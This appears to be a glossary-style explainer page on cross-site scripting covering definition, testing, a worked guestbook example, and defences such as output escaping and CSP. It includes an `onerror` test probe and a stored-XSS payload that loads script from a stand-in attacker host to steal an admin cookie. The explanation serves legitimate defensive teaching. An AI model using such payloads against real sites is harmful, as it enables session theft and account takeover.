Malware

Cross-site scripting

Also called XSS.

Cross-site scripting is getting a victim's browser to run an attacker's JavaScript as part of your page. From there the script can read cookies, steal tokens, change what the page shows, or send keystrokes elsewhere.

How it is measured

Test every place user input is echoed: search boxes, comments, profile names, URL parameters, error messages. Submit `<img src=x onerror=alert(1)>` and see whether it executes. Automated scanners fuzz with payloads; manual review follows the data from input to output.

Classify the finding. Reflected XSS lives in a single request. Stored XSS sits in the database and hits everyone who views it. DOM XSS happens entirely in client-side code, so the server never sees it.

Worked example

A guestbook plugin on a small travel blog prints the visitor's name straight into the page. An attacker signs as `<script src=//evil.example/s.js></script>`. Every reader who opens the guestbook runs that file, which reads the admin cookie when the owner visits and posts it to the attacker.

The author switches to `esc_html()` on output and the signature renders as harmless text. A CSP with no inline allowances would have also blocked the load.

How it differs

XSS runs attacker code in your page. CSRF sends a forged request from your user's browser without running any code of the attacker's inside your origin. CSP is a defense layer against XSS, not a fix: it limits what injected script can do. CWE lists XSS as a weakness class, with many CVEs of its own.

Common errors

Filtering input and forgetting to escape output. Escaping for HTML but not for attributes, URLs, or JavaScript. Trusting a rich-text editor. Removing `<script>` tags with a regex. Skipping `innerHTML` review in front-end code. Believing HttpOnly cookies make XSS harmless.

In practice

Escape on output in the context where the data lands. Use framework defaults, and treat `dangerouslySetInnerHTML` and `innerHTML` as review triggers. Add a CSP that forbids inline script, then read the first week of violation reports for places you missed.

See also

Content Security Policy, Cross-site request forgery, CWE

Sources

Count this on a real site.

Watch my website